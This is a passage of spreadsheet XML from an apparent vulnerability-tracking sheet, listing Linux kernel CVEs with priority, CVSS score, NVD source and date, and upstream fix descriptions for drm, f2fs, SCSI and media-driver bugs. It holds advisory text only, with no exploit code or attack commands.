          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89819</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89823</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm: fix race between partial drm_dev_register() failure and ioctl
If drm_dev_register() fails after registering a minor (e.g. render minor
registered, primary minor fails), userspace could have opened the first
minor and entered a drm_dev_enter() critical section. Since the
unplugged flag was never set, the ioctl proceeds while the error path
tears down device resources.
Fix this by introducing drm_dev_synchronize_unplug(), which sets the
unplugged flag and waits for the SRCU barrier, ensuring all in-flight
drm_dev_enter() critical sections complete before cleanup proceeds; call
it on the error path of drm_dev_register().</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89823</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89825</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: fix firmware control interface bounds checks
panthor_init_cs_iface() and panthor_init_csg_iface() validate firmware
control interface offsets with 32-bit arithmetic and the size of the host
wrapper structures. The offsets are derived from firmware-provided strides,
so the arithmetic can wrap before the bounds check, and the host wrapper
size is not the size of the firmware control interface being mapped.
Use 64-bit arithmetic for the computed offsets and validate against the
actual firmware control interface structure sizes with subtraction-based
bounds checks. Also validate that the shared section is large enough for
the global control interface before using it.</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89825</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89829</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to pass folio-&gt;index to f2fs_sanity_check_node_footer()
Otherwise in f2fs_sanity_check_node_footer(), it will check the
same nid incorrectly.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89829</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89832</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="inlineStr"/>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to clear dirty flag on folio in error path
If node block is corrupted due to chksum mismatch or inconsistent
footer info, it needs to drop clear flag of node folio, in order
to persist inconsistent node data to storage.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89832</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89836</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="inlineStr"/>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix folio_nr_pages() race after put in large folio invalidate
Our v6.18 based Android system is continuely suffering livelock and bad
page stat as shown in[1] which related to broken xarray slot status. By
investigating big folio operations within f2fs, we find below races and
fix it by get the nr_pages before drop the refcount and folio_lock.
f2fs_get_read_data_folio() calls f2fs_folio_put() before
folio_nr_pages() when invalidating a large folio from the page cache.
That unlocks the folio and drops the caller reference, leaving a window
where a concurrent truncate or folio split can shrink the compound folio
or free it before the invalidate range is computed. An undersized range
then leaves split sub-folios in mapping-&gt;i_pages, which can later
interact badly with truncate and reclaim (stale xarray entries and bad
page state when folio-&gt;mapping no longer matches the mapping being
truncated).
[1]
PID: 2594     TASK: ffffff8169b81580  CPU: 7    COMMAND: "Thread-3"
 #0 [ffffffc08ef2b8a0] xas_load at ffffffe52d1f42a4
 #1 [ffffffc08ef2b900] find_get_entries at ffffffe52c185798
 #2 [ffffffc08ef2bb60] truncate_inode_pages_range at ffffffe52c19e83c
 #3 [ffffffc08ef2bbc0] truncate_inode_pages_final at ffffffe52c19ec2c
 #4 [ffffffc08ef2bc20] f2fs_evict_inode at ffffffe52c4c8400
 #5 [ffffffc08ef2bcc0] evict at ffffffe52c2de9f4
 #6 [ffffffc08ef2bd00] iput at ffffffe52c2db1b4
 #7 [ffffffc08ef2bd30] dentry_unlink_inode at ffffffe52c2d7204
 #8 [ffffffc08ef2bd50] __dentry_kill at ffffffe52c2d3dcc
 #9 [ffffffc08ef2bd80] dput at ffffffe52c2d3c3c
 #10 [ffffffc08ef2bda0] __fput at ffffffe52c2b0a7c
 #11 [ffffffc08ef2bde0] ____fput at ffffffe52c2b1034
 #12 [ffffffc08ef2bdf0] task_work_run at ffffffe52beea200
 #13 [ffffffc08ef2be20] exit_to_user_mode_loop at ffffffe52bfbc17c
 #14 [ffffffc08ef2be80] el0_svc at ffffffe52d1f8e54
 #15 [ffffffc08ef2beb0] el0t_64_sync_handler at ffffffe52d1f8d10</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89836</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89841</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: only redirty pinned folios in redirty_blocks
redirty_blocks() pins folios with read_cache_folio() and then walks the
same range again with filemap_lock_folio() to redirty them and drop the
references it took.
Commit 5951fee46bef ("f2fs: Use a folio in redirty_blocks()") changed
the second pass to a do/while loop. If read_cache_folio() fails before
anything is pinned, page_idx does not advance but the cleanup loop still
runs once.
If readahead has already populated the failed folio in page cache, that
extra iteration finds it and folio_put_refs(folio, 2) drops one
reference too many. Later drop_caches or reclaim can then report
"BUG: Bad page state".
Only redirty the range that was pinned successfully.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89841</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89854</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix cs84xx use-after-free on host teardown
qla84xx_put_chip() drops the last reference to ha-&gt;cs84xx and frees it via
__qla84xx_chip_release() without clearing ha-&gt;cs84xx. During teardown it ran
before scsi_remove_host(), which is what removes the 84xx_fw_version host
sysfs attribute. A concurrent read of that attribute in the window between
the two calls executes qla24xx_84xx_fw_version_show(), which dereferences
the freed ha-&gt;cs84xx, resulting in a use-after-free.
Move qla84xx_put_chip() to after scsi_remove_host() in both
qla2x00_remove_one() and qla2x00_disable_board_on_pci_error(). Once
scsi_remove_host() returns, the sysfs attribute is gone and kernfs has
drained any in-flight show(), so no reader can touch cs84xx; the put still
runs before the host and ha are freed.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89854</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89870</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: zoran: Avoid freeing a registered video_device twice
zoran_init_video_device() installs zoran_vdev_release() as the
video_device release callback through zoran_template. After
video_register_device() succeeds, video_unregister_device() drops the
registered video_device reference and the V4L2 core eventually invokes
that release callback, which kfree()s the video_device.
zoran_exit_video_devices() called video_unregister_device() and then
kfree(zr-&gt;video_dev), so device teardown could free the same
video_device twice.
Remove the direct kfree() and clear the cached pointer after
unregistering. The pre-registration failure path keeps its manual free
because the video_device was not registered there.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89870</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89873</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate HEVC EXT SPS RPS counts
The HEVC SPS control carries the short-term and long-term RPS counts
that decoder drivers use to walk the matching EXT SPS dynamic arrays.
Reject SPS values that exceed the HEVC limits of 64 short-term sets and
32 long-term references so drivers cannot later index beyond those
controls.
Also reject EXT SPS ST RPS entries whose negative or positive picture
counts exceed the 16-entry arrays, or whose combined delta-POC count
exceeds the HEVC DPB maximum.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89873</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89875</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: ti: vpe: quiesce overflow recovery before freeing streams
The VIP overflow recovery worker is armed from the hardirq handler when a
FIFO overflow is detected, and the list-complete path looks the stream up
through the VPDMA list private pointer. Both keep touching stream, port
and device state; the recovery worker also resets the parser and VPDMA,
repopulates the descriptor list, and re-enables the per-list IRQs.
vip_stop_streaming() masks and clears the per-list IRQs, but it neither
synchronizes the hardirq handler nor disables recovery_work. An overflow
IRQ that has already queued recovery_work, or a list-complete IRQ in
flight when the stream is torn down, can therefore still dereference the
stream after its resources are released: the descriptor list is freed by
vip_release_stream() on file release, and the stream itself by
free_stream() on unbind/remove.
Drain the recovery worker and the IRQ handler at both teardown points
through a shared vip_quiesce_stream() helper, before any stream-owned
resource is released. disable_work_sync() cancels pending recovery_work,
drains a running instance, and raises its disable depth, so a subsequent
schedule_work() issued by a racing IRQ handler is rejected at the
workqueue scheduler: recovery_work cannot be requeued after
disable_work_sync() takes effect. The worker may still re-enable the
per-list IRQs before disable_work_sync() returns; disable_irqs() then
masks those sources and synchronize_irq() waits for any in-flight handler
that still dereferences stream state. In vip_stop_streaming() the helper
runs before the parser is stopped, since a worker drained by
disable_work_sync() may re-enable the parser before exiting and would
otherwise undo the stop. recovery_work is created disabled and enabled in
vip_start_streaming() before IRQs, pairing the enable with the teardown
disable across the streaming lifecycle.
This issue was found by an in-house static analysis tool and confirmed
by manual code review.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89875</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89880</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rtl2832_sdr: release URBs and stream buffers on start_streaming() failure
rtl2832_sdr_start_streaming() calls rtl2832_sdr_alloc_stream_bufs(),
rtl2832_sdr_alloc_urbs() and rtl2832_sdr_submit_urbs() in sequence and
shares a single err: label that only unlocks the mutex and returns.
When alloc_urbs() succeeds but submit_urbs() fails, or when alloc_urbs()
itself returns -ENOMEM after alloc_stream_bufs() has already succeeded,
the URBs and/or the coherent DMA stream buffers stay allocated while
streaming reports failure to vb2. Two latent defects follow on the next
VIDIOC_STREAMON:
1) rtl2832_sdr_alloc_stream_bufs() unconditionally resets dev-&gt;buf_num
   to 0 and overwrites dev-&gt;buf_list[]/dev-&gt;dma_addr[], permanently
   leaking the coherent DMA memory allocated by the previous attempt.
2) rtl2832_sdr_alloc_urbs() never resets dev-&gt;urbs_initialized and only
   increments it. After a second successful pass urbs_initialized can
   exceed MAX_BULK_BUFS, so the subsequent rtl2832_sdr_free_urbs() walks
   from urbs_initialized - 1 down to 0 and reads past the end of
   dev-&gt;urb_list[], passing garbage pointers to usb_free_urb().
Mirror the teardown that stop_streaming() already performs: on the error
path call rtl2832_sdr_free_urbs() and rtl2832_sdr_free_stream_bufs()
before unlocking. Both helpers are idempotent (free_urbs kills and zeros
urbs_initialized; free_stream_bufs is gated on URB_BUF and clears the
buf_num counter), so partial-failure paths and the no-allocation paths
remain safe.
Issue identified by automated review of the INV-003 series at
https://sashiko.dev/</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89880</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89882</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rkvdec: hevc: guard INTER_REF_PIC_SET_PRED index underflow
st_ref_pic_set_prediction() computes the reference RPS index as
st_rps_idx - (delta_idx_minus1 + 1) per HEVC spec equation 7-59.
Both operands are u8, so when delta_idx_minus1 + 1 exceeds the
current index the subtraction wraps and the subsequent array access
at calculated_rps_st_sets[ref_rps_idx] reads far out of bounds.
A userspace V4L2 client that can open the RKVDEC m2m decoder can
submit an EXT_SPS_ST_RPS control with INTER_REF_PIC_SET_PRED set
and delta_idx_minus1 crafted to trigger the underflow.
Reject the entry early when the reference index would underflow.</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89882</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89883</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rc: sunxi-cir: Unregister rc device on probe failure
After rc_register_device() succeeds, later probe failures must undo the
registration with rc_unregister_device(). The current error path jumps to
the allocation cleanup label and only calls rc_free_device(), leaving the
rc device registration and resources created by rc_register_device()
behind.
Add a registered-device unwind label for the IRQ lookup, IRQ request, and
hardware initialization failure paths. Keep rc_free_device() for failures
before rc_register_device() succeeds.</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89883</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89887</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
